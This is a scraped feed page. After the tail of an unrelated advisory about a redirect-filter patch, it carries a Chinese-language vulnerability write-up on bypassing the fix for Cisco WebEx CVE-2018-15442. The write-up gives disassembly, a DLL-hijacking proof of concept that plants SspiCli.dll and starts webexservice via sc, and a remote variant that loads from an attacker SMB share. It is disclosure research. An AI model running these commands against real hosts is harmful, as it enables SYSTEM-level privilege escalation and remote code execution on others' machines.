The regular expression filtering redirection targets has been updated to account for a mix of forward and backward slashes.

The patch for this issue is available here for branch 2.7.

Credits

I would like to thank the EC-CUBE Dev Team for reporting the issue and Christian Flothmann for fixing it.

Cisco Webex Meetings桌面应用特权提升漏洞分析(CVE-2018-15442)

$
0
0
概述

前一段时间,Ron Bowes在Cisco WebEx Meetings桌面版应用程序中发现了一个漏洞,该漏洞可能允许本地权限提升,或者在攻击者拥有一个用户权限的情况下,可以使用psexec以SYSTEM身份获取远程代码。该研究人员将该漏洞命名为WebExec,并且还为该漏洞设计了一个网站。

通过重新分析和尝试利用CVE-2018-15442漏洞,我们发现了原始漏洞的绕过方法。由于原始漏洞和这一绕过方法非常类似,因此Cisco决定不再发布新的CVE,我们同意这一选择。从技术上看,它是一个远程代码执行漏洞,分析触发这一漏洞的方式比介绍如何在本地进行漏洞利用要更有意义。

在WebEx的官网上,解释了WebEx的功能,可以快速总结为:

……通过WebEx Meetings,可以轻松加入会议,提供清晰的音频和视频,并具有更加简便的屏幕共享方式。我们帮助您忘记技术,只专注于重要的事情……

但是,Cisco还应该注意所使用技术的安全性。

在阅读了Ron的博客文章后,我们了解到,底层问题是WebExService使用了由用户控制的二进制文件,并将其以SYSTEM权限执行。我认为,没有比这更能简单利用的漏洞了。

重新分析漏洞

根据Ron的分享,在漏洞修复后,WebEx将会检查可执行文件是否经过WebEx的签名。

修复后的WebEx仍然允许远程用户连接到进程,并且启动进程。但是,如果进程检测到它运行了未经WebEx签名的可执行文件,那么执行将会停止。但是,他们并没有给出主机是否易受攻击的信息。

我们首先检查补丁状态,在从Cisco的CDN安装最新版本后,确认已经没有可用的更新:


Cisco Webex Meetings桌面应用特权提升漏洞分析(CVE-2018-15442)

接下来,我们对存储在C:\Program Files\Webex\Webex\Applications\WebExService.exe的二进制文件进行分析,可以找到一些值得关注的地方。我注意到的第一件事,就是代码只会查找一个参数类型,就是软件更新。

.text:00402DC4 loc_402DC4: ; CODE XREF: sub_402D80+1C
.text:00402DC4 push offset aSoftwareUpdate ; "software-update"
.text:00402DC9 push dword ptr [esi+8] ; lpString1
.text:00402DCC call ds:lstrcmpiW
.text:00402DD2 test eax, eax
.text:00402DD4 jnz loc_402E66
.text:00402DDA push 208h ; Size
.text:00402DDF push eax ; Val
.text:00402DE0 lea eax, [ebp+Dst]
.text:00402DE6 push eax ; Dst
.text:00402DE7 call memset
.text:00402DEC add esp, 0Ch
.text:00402DEF lea eax, [ebp+Dst]
.text:00402DF5 push offset pszFile ; "ptupdate.exe"
.text:00402DFA push dword ptr [esi+10h] ; pszDir
.text:00402DFD push eax ; pszDest
.text:00402DFE call ds:PathCombineW
.text:00402E04 sub esp, 18h
.text:00402E07 lea eax, [ebp+Dst]
.text:00402E0D mov ecx, esp ; Dst
.text:00402E0F mov [esi+10h], eax
.text:00402E12 push eax ; Src
.text:00402E13 call sub_402EB0
.text:00402E18 call sub_402310 ; signature check on ptupdate.exe
.text:00402E1D add esp, 18h
.text:00402E20 test eax, eax
.text:00402E22 jz short loc_402E46 ; jump if we don't pass the check!
.text:00402E24 lea eax, [ebp+var_214]
.text:00402E2A mov [ebp+var_214], 0
.text:00402E34 push eax
.text:00402E35 push ecx
.text:00402E36 lea ecx, [edi-3]
.text:00402E39 lea edx, [esi+0Ch]
.text:00402E3C call sub_402960 ; execute "ptupdate.exe" as winlogon.exe

随后,代码将使用命令行中提供的参数ptupdate.exe去执行PathCombineW调用。这就是我停止逆向分析的地方,我甚至懒得去逆向签名检查函数以及模拟和执行的函数,因为我已经有了一个攻击的计划。

漏洞利用

所以,我们需要做的就是将C:\Program Files\Webex\Webex\Applications\*(包括ptUpdate.exe二进制文件)复制到方可或本地用户所拥有的、被用户控制的文件夹中(可以是沙箱中的目录),并找到DLL注入漏洞,或者通过删除一个DLL来强制实现。

在这时,我们并不希望应用程序的正常功能受到影响,因此我们要寻找一个不会影响应用状态的DLL,进行DLL注入。为实现这一点,我运行了我的概念证明:

mkdir %cd%\\si
copy C:\\PROGRA~1\\Webex\\Webex\\Applications\\* %cd%\\si\\*
sc start webexservice a software-update 1 %cd%\\si

事实证明,SspiCli.dll看起来像一个不错的目标。


Cisco Webex Meetings桌面应用特权提升漏洞分析(CVE-2018-15442)

当然,我们可以只是交叉引用43个LoadLibraryW调用,并利用其中一个。然而,我的概念证明利用需要4个命令,而不是3个。

mkdir %cd%\\si
copy C:\\PROGRA~1\\Webex\\Webex\\Applications\\* %cd%\\si\\*
copy SspiCli.dll %cd%\\si
sc start webexservice a software-update 1 %cd%\\si
Cisco Webex Meetings桌面应用特权提升漏洞分析(CVE-2018-15442)

如上所述,我们可以利用该技术实现远程代码执行,但不管怎样都要事先经过身份验证。

sc \\victim start webexservice a software-update 1
\\attacker\share\si

总结

无论何时,只要能控制一个由高权限服务执行的文件操作路径,理论上就能够实现攻击。这一漏洞非常简单,也非常强大,因为它可以通过SMB从远程触发,同时存在一个对攻击者来说非常完美的沙箱逃逸漏洞。我相信,这一逻辑缺陷在以后会成为一个严重的漏洞,因为它们可以实现99%的操作系统级别缓解。

令人难以置信的是,Cisco居然无法在第一时间修复这一问题。他们所需要做的,只有调整为使用C:\Program Files\Webex\Webex\Applications目录的固定路径,同时删除用户控制的输入。发现该漏洞后,我将该漏洞重新命名为“WebExec重新加载漏洞”,其含义是:这个漏洞让攻击者再一次能够加载任意DLL。

最后,要感谢iDefense在漏洞通知和处置过程中的协调工作。

参考文章

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20181024-webex-injection

https://blog.skullsecurity.org/2018/technical-rundown-of-webexec

Viewing all 12749 articles
Browse latest View live